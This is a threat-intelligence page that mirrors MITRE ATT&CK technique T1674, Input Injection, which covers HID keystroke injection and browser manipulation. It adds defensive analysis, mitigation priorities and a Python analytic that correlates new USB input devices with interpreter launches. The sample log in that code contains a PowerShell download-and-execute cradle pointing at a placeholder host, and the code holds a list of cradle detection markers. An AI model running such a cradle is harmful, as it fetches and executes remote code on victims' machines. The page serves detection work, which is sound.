T1674: Input Injection
Adversaries may simulate keystrokes on a victim’s computer by various means to perform any type of action on behalf of the user, such as launching the command interpreter using keyboard shortcuts, typing an inline script to be executed, or interacting directly with a GUI-based application. These actions can be preprogrammed into adversary tooling or executed through physical devices such as Human Interface Devices (HIDs).
For example, adversaries have used tooling that monitors the Windows message loop to detect when a user visits bank-specific URLs. If detected, the tool then simulates keystrokes to open the developer console or select the address bar, pastes malicious JavaScript from the clipboard, and executes it - enabling manipulation of content within the browser, such as replacing bank account numbers during transactions.[1][2]
Adversaries have also used malicious USB devices to emulate keystrokes that launch PowerShell, leading to the download and execution of malware from adversary-controlled servers.[3]
Analyst context for executives and security teams
Input Injection matters because it can turn a trusted user session into an execution path: simulated keystrokes or HID-style input can launch interpreters, paste commands or scripts, and manipulate GUI applications without using a traditional exploit. For leaders, this is a reminder that endpoint risk is not only malware files and network traffic; physical peripheral control, user-session monitoring, clipboard/script behavior, and application execution policy can materially affect business continuity and fraud resilience.
Executive priority
Prioritize this technique where workstations have access to financial applications, administrative consoles, sensitive SaaS sessions, or operational systems. The key management question is whether the organization can prevent or quickly investigate unauthorized hardware use and unexpected script or interpreter execution initiated from an interactive session. This also supports audit and compliance evidence around device control, application control, and endpoint monitoring, especially for environments exposed to mailed devices, shared workstations, or high-value transaction workflows.
Technical view
ATT&CK places T1674 under Execution for Windows, macOS, and Linux. SOC and IR teams should validate coverage for simulated keyboard activity that results in command interpreters, scripts, browser developer tooling, address-bar interaction, clipboard paste-and-execute behavior, or GUI-driven actions. Because MITRE does not provide official detection text for this object, use the related DET0568 detection strategy as a pointer for detection engineering, but validate locally against available endpoint, device-control, process, browser, and script telemetry. Relationship context also highlights M1034 Limit Hardware Installation and M1038 Execution Prevention as the most directly supported control families.
Likely telemetry
- Endpoint process creation and parent/child process relationships for shells, scripting engines, and downloaded executables
- Script execution logs and command-line telemetry where available
- USB/HID device connection, driver installation, and hardware policy events
- Endpoint security alerts for unapproved peripheral use or device-control violations
- Clipboard, browser, or GUI interaction telemetry where available and privacy-appropriate
Detection direction
- Validate whether DET0568 or an equivalent local analytic exists for input injection behavior; MITRE supplied no official detection details in the technique object.
- Correlate new or unusual HID/USB device activity with rapid process launches, interpreter execution, script execution, or outbound downloads.
- Tune for false positives from legitimate automation, accessibility tools, remote support tools, testing frameworks, and approved macro or RPA workflows.
- Review high-risk workflows such as online banking, finance operations, administrative portals, and browser-based business applications for signs of scripted GUI manipulation.
- Do not rely only on malware file detection; this behavior may use legitimate user-interface paths and trusted applications.
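The correlation step in the detection direction above, as an added worked example that is not part of the ATT&CK object or of this page's analysis: a small Python analytic that joins Windows Security event 6416 (a new external device recognized) with Sysmon Event ID 1 (process creation) and raises an alert when an input-class device appears on a host and an interpreter is launched from the interactive session within a short window. The field names (ClassName, DeviceId, Image, ParentImage, CommandLine) follow the Windows and Sysmon schemas; the JSON-lines layout, hostnames, device IDs, the 60-second window, the choice of explorer.exe as the "interactive parent", and the download-cradle markers are assumptions for illustration, and the log records are constructed.

```python
import json
from datetime import datetime, timedelta

# Constructed sample telemetry (not real logs): Windows Security event 6416
# ("A new external device was recognized by the system") and Sysmon Event ID 1
# (process creation), flattened to JSON lines as a SIEM export might emit them.
SAMPLE_LOG = r"""
{"ts": "2025-03-27T10:15:02Z", "host": "WS01", "event_id": 6416, "ClassName": "HIDClass", "DeviceDescription": "USB Input Device", "DeviceId": "USB\\VID_16C0&PID_047C\\0001"}
{"ts": "2025-03-27T10:15:04Z", "host": "WS01", "event_id": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe -NoP -W Hidden -Ep Bypass -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"}
{"ts": "2025-03-27T11:00:00Z", "host": "WS02", "event_id": 6416, "ClassName": "HIDClass", "DeviceDescription": "USB Input Device", "DeviceId": "USB\\VID_046D&PID_C52B\\0002"}
{"ts": "2025-03-27T11:00:03Z", "host": "WS02", "event_id": 1, "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "\"WINWORD.EXE\""}
{"ts": "2025-03-27T12:00:00Z", "host": "WS03", "event_id": 1, "Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "cmd.exe"}
{"ts": "2025-03-27T13:00:00Z", "host": "WS04", "event_id": 6416, "ClassName": "USB", "DeviceDescription": "USB Mass Storage Device", "DeviceId": "USB\\VID_0781&PID_5583\\4C53"}
{"ts": "2025-03-27T13:00:02Z", "host": "WS04", "event_id": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "powershell.exe -File E:\\setup.ps1"}
"""

# Assumptions for this example: which images count as interpreters, which
# parent means "launched from the desktop session", and which device classes
# count as input devices. Tune all three to local telemetry.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
INTERACTIVE_PARENTS = {"explorer.exe"}
HID_CLASSES = {"hidclass", "keyboard", "mouse"}
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest", "iwr ",
                    "bitsadmin", "-enc", "encodedcommand", "frombase64string")
WINDOW = timedelta(seconds=60)


def parse_log(text):
    """Parse JSON lines into dicts with a timezone-aware datetime, oldest first."""
    events = []
    for line in text.strip().splitlines():
        line = line.strip()
        if not line:
            continue
        rec = json.loads(line)
        rec["ts"] = datetime.fromisoformat(rec["ts"].replace("Z", "+00:00"))
        events.append(rec)
    return sorted(events, key=lambda r: r["ts"])


def basename(path):
    """Last component of a Windows path, lower-cased."""
    return path.rsplit("\\", 1)[-1].lower()


def correlate(events, window=WINDOW, approved_vendor_ids=()):
    """Return alerts for interpreter launches that follow a new input device.

    approved_vendor_ids: substrings of DeviceId (e.g. "VID_046D") for managed
    keyboards/mice that should not trigger, the exception-governance knob.
    """
    recent_hid = {}  # host -> list of 6416 records seen so far
    alerts = []
    for rec in events:  # events are time-ordered, so look-back is a simple scan
        if rec["event_id"] == 6416:
            if rec.get("ClassName", "").lower() not in HID_CLASSES:
                continue  # mass storage etc. is a different execution path
            dev_id = rec.get("DeviceId", "").upper()
            if any(v.upper() in dev_id for v in approved_vendor_ids):
                continue
            recent_hid.setdefault(rec["host"], []).append(rec)
            continue
        if rec["event_id"] != 1:
            continue
        if basename(rec.get("Image", "")) not in INTERPRETERS:
            continue
        if basename(rec.get("ParentImage", "")) not in INTERACTIVE_PARENTS:
            continue
        for dev in recent_hid.get(rec["host"], []):
            delta = rec["ts"] - dev["ts"]
            if timedelta(0) <= delta <= window:
                cmd = rec.get("CommandLine", "").lower()
                cradle = any(m in cmd for m in DOWNLOAD_MARKERS)
                alerts.append({
                    "host": rec["host"],
                    "device": dev.get("DeviceDescription", ""),
                    "device_id": dev.get("DeviceId", ""),
                    "interpreter": basename(rec["Image"]),
                    "seconds_after_device": delta.total_seconds(),
                    "command_line": rec.get("CommandLine", ""),
                    # a download cradle or encoded command right after a new
                    # keyboard is the pattern from the cited USB cases
                    "severity": "high" if cradle else "medium",
                })
    return alerts


if __name__ == "__main__":
    for a in correlate(parse_log(SAMPLE_LOG)):
        print(json.dumps(a, indent=2))
```

On the constructed input only WS01 alerts (PowerShell two seconds after a new HID device, with a download cradle, so severity high); WS02 launches Word after a keyboard, WS03 launches cmd.exe with no device event, and WS04's mass-storage device is ignored by this rule, all of which stay silent. Passing approved_vendor_ids={"VID_16C0"} suppresses the WS01 alert, which is how an approved-peripheral list should be fed into the analytic rather than by disabling it. The parent check is the weakest assumption: Windows Terminal, remote-support agents and RPA tooling all change the parent chain, so validate it against local baselines before relying on it.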
Mitigation priorities
- Start with M1034-style hardware controls: restrict unauthorized peripheral and HID usage, limit driver installation, and enforce hardware usage policy on sensitive endpoints.
- Apply M1038-style execution prevention: restrict unauthorized scripts, interpreters, and untrusted code execution where operationally feasible.
- Harden high-value workstations used for financial, administrative, or operational tasks with stronger device control and application control baselines.
- Create incident-response playbooks for suspicious USB/HID events followed by script or command execution.
- Maintain exception governance so legitimate accessibility, support, automation, and business peripherals do not become unmanaged blind spots.
Analyst notes and limits
The FIN7 relationship indicates that ATT&CK associates this technique with that group, whose profile is financially motivated and spans multiple industries, but this summary does not imply current targeting or customer exposure. The official examples reference browser manipulation in banking contexts and malicious USB devices leading to PowerShell-based download and execution, so the practical defensive focus is endpoint execution control plus hardware/device governance.
The ATT&CK object provides no official detection text, no procedure details beyond cited examples, and no platform-specific implementation guidance beyond Windows, macOS, and Linux. Local telemetry, privacy constraints, endpoint tooling, and approved automation practices will determine whether detections are feasible and reliable.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Groups, software, and campaigns
G0046: FIN7
FIN7 is a financially-motivated threat group that has been active since 2013. FIN7 has targeted the retail, restaurant, hospitality, software, consulting, financial services, medical equipment, cloud services, media, food and beverage, transportation, pharmaceutical, and utilities industries in the United States. A portion of FIN7 was operated out of a front company called Combi Security and often used point-of-sale malware for targeting efforts. Since 2020, FIN7 shifted operations to big game hunting (BGH), including use of REvil ransomware and their own Ransomware-as-a-Service (RaaS), Darkside. FIN7 may be linked to the Carbanak Group, but multiple threat groups have been observed using Carbanak, leading these groups to be tracked separately.[1][2][3][4][5][6][7]
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.0 | | Current bundle | ffc26fd457e9… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
[1] Catalin Cimpanu. (2018, May 25). BackSwap Banking Trojan Uses Never-Before-Seen Techniques. BleepingComputer. Retrieved March 27, 2025.
[2] Michal Poslušný. (2018, May 25). BackSwap malware finds innovative ways to empty bank accounts. WeLiveSecurity. Retrieved March 27, 2025.
[3] Ionut Ilascu. (2020, March 27). FBI: Hackers Sending Malicious USB Drives & Teddy Bears via USPS. BleepingComputer. Retrieved March 27, 2025.
[4] MITRE ATT&CK. T1674: Input Injection.
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.